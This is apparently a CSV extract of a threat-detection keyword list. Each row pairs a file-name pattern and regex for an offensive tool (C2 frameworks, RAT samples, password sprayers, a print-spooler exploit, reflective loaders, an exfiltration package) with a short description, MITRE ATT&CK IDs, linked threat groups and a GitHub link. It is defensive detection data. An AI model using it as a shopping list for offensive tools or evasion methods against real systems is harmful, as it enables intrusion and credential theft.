"*\specpayload.py*",".{0,1000}\\specpayload\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19025" "*\specpromptpayload.py*",".{0,1000}\\specpromptpayload\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for 
interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19026" "*\specula.py*",".{0,1000}\\specula\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19027" "*\specula_com.dll*",".{0,1000}\\specula_com\.dll.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19028" "*\specula_log.txt*",".{0,1000}\\specula_log\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19029" "*\SpeculaApi.cpp*",".{0,1000}\\SpeculaApi\.cpp.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive 
operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19030" "*\SpeculaApi.dll*",".{0,1000}\\SpeculaApi\.dll.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19031" "*\SpeculaApi.Specula*",".{0,1000}\\SpeculaApi\.Specula.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19032" "*\SpeculaApi.x64.dll*",".{0,1000}\\SpeculaApi\.x64\.dll.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19033" "*\spellbound-main*",".{0,1000}\\spellbound\-main.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) 
framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z","19036" "*\spellgen.py *",".{0,1000}\\spellgen\.py\s.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z","19037" "*\spellstager.py *",".{0,1000}\\spellstager\.py\s.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z","19038" "*\spider_plus.py*",".{0,1000}\\spider_plus\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","19039" "*\Spider-Virus RAT v*.exe*",".{0,1000}\\Spider\-Virus\sRAT\sv.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19040" "*\spinningteacup.py*",".{0,1000}\\spinningteacup\.py.{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","19041" "*\SPNSearcher.exe*",".{0,1000}\\SPNSearcher\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","19045" "*\spoof.py*",".{0,1000}\\spoof\.py.{0,1000}","offensive_tool_keyword","DLL-Spoofer","POC for a DLL spoofer to determine DLL Hijacking","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/MitchHS/DLL-Spoofer","1","0","N/A","N/A","9","1","60","7","2025-03-04T14:14:15Z","2023-10-18T14:34:38Z","19046" "*\SpoofCmdLine\TheThing*",".{0,1000}\\SpoofCmdLine\\TheThing.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. 
The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","19047" "*\spoofer.py*",".{0,1000}\\spoofer\.py.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","19048" "*\spoofing-office-macro-master*",".{0,1000}\\spoofing\-office\-macro\-master.{0,1000}","offensive_tool_keyword","spoofing-office-macro","PoC of a VBA macro spawning a process with a spoofed parent and command line","T1055.011 - T1127 - T1077","TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/christophetd/spoofing-office-macro","1","0","N/A","N/A","9","4","381","82","2020-04-28T16:23:43Z","2019-03-11T18:23:39Z","19049" "*\spoofIPs_client.py*",".{0,1000}\\spoofIPs_client\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","19050" "*\spooler.py*",".{0,1000}\\spooler\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","19052" 
"*\SpoolFool.exe*",".{0,1000}\\SpoolFool\.exe.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","19053" "*\SpoolFool.ps1*",".{0,1000}\\SpoolFool\.ps1.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","19054" "*\SpoolFool.sln*",".{0,1000}\\SpoolFool\.sln.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","19055" "*\SpoolFool-main*",".{0,1000}\\SpoolFool\-main.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","19056" "*\SpoolTrigger.x64.dll*",".{0,1000}\\SpoolTrigger\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - 
T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","19057" "*\SpoolTrigger.x86.dll*",".{0,1000}\\SpoolTrigger\.x86\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","19058" "*\SPR by Mizore.exe*",".{0,1000}\\SPR\sby\sMizore\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19059" "*\SprayAD.cna*",".{0,1000}\\SprayAD\.cna.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - 
TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","0","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","19060" "*\SprayAD.exe*",".{0,1000}\\SprayAD\.exe.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","0","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","19061" "*\spraycharles.py*",".{0,1000}\\spraycharles\.py.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","N/A","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","19062" "*\sprayed-creds.txt*",".{0,1000}\\sprayed\-creds\.txt.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","19063" "*\sprayed-creds.txt*",".{0,1000}\\sprayed\-creds\.txt.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - 
T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","19064" "*\SprayLove.py",".{0,1000}\\SprayLove\.py","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","19065" "*\spray-results.txt*",".{0,1000}\\spray\-results\.txt.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","19066" "*\SpyGate-RAT *.exe*",".{0,1000}\\SpyGate\-RAT\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT 
samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19067" "*\Spyndicapped.exe*",".{0,1000}\\Spyndicapped\.exe.{0,1000}","offensive_tool_keyword","Spyndicapped","COM ViewLogger - keylogger","T1574.001 - T1574.002 - T1574.009","TA0006","N/A","N/A","Credential Access","https://github.com/CICADA8-Research/Spyndicapped","1","0","N/A","N/A","10","4","356","50","2025-01-06T07:31:29Z","2024-12-25T11:47:39Z","19068" "*\Spyndicapped_dev\*",".{0,1000}\\Spyndicapped_dev\\.{0,1000}","offensive_tool_keyword","Spyndicapped","COM ViewLogger - keylogger","T1574.001 - T1574.002 - T1574.009","TA0006","N/A","N/A","Credential Access","https://github.com/CICADA8-Research/Spyndicapped","1","0","#content","N/A","10","4","356","50","2025-01-06T07:31:29Z","2024-12-25T11:47:39Z","19069" "*\Spyndicapped-main*",".{0,1000}\\Spyndicapped\-main.{0,1000}","offensive_tool_keyword","Spyndicapped","COM ViewLogger - keylogger","T1574.001 - T1574.002 - T1574.009","TA0006","N/A","N/A","Credential Access","https://github.com/CICADA8-Research/Spyndicapped","1","0","N/A","N/A","10","4","356","50","2025-01-06T07:31:29Z","2024-12-25T11:47:39Z","19070" "*\SpyNet.exe*",".{0,1000}\\SpyNet\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19071" "*\Spy-Net.exe*",".{0,1000}\\Spy\-Net\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from 
Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19072" "*\SpyNote.exe*",".{0,1000}\\SpyNote\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19073" "*\SpySytem RAT.exe*",".{0,1000}\\SpySytem\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19074" "*\SQLC2.ps1*",".{0,1000}\\SQLC2\.ps1.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","19075" "*\SQLC2CMDS.dll*",".{0,1000}\\SQLC2CMDS\.dll.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","19076" "*\SQLInfoDumps*",".{0,1000}\\SQLInfoDumps.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","19077" "*\SQLRecon*",".{0,1000}\\SQLRecon.{0,1000}","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - 
TA0006 - TA0002 - TA0004","N/A","Black Basta","Exploitation tool","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","9","8","719","120","2025-01-10T17:42:49Z","2021-11-19T15:58:49Z","19078" "*\src\check\Credentials.ps1*",".{0,1000}\\src\\check\\Credentials\.ps1.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","19079" "*\src\KaynInject.c*",".{0,1000}\\src\\KaynInject\.c.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","19080" "*\src\KaynLdr.c*",".{0,1000}\\src\\KaynLdr\.c.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","19081" "*\src\KaynStrike.c*",".{0,1000}\\src\\KaynStrike\.c.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","19082" "*\src\links\windows\src\evasion.rs*",".{0,1000}\\src\\links\\windows\\src\\evasion\.rs.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 
- T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","19083" "*\Src\Recon-AD-Groups\*",".{0,1000}\\Src\\Recon\-AD\-Groups\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","19084" "*\Src\Recon-AD-Users\*",".{0,1000}\\Src\\Recon\-AD\-Users\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","19085" "*\SSH R.A.T.exe*",".{0,1000}\\SSH\sR\.A\.T\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19088" "*\SSH R.A.T.exe*",".{0,1000}\\SSH\sR\.A\.T\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19089" 
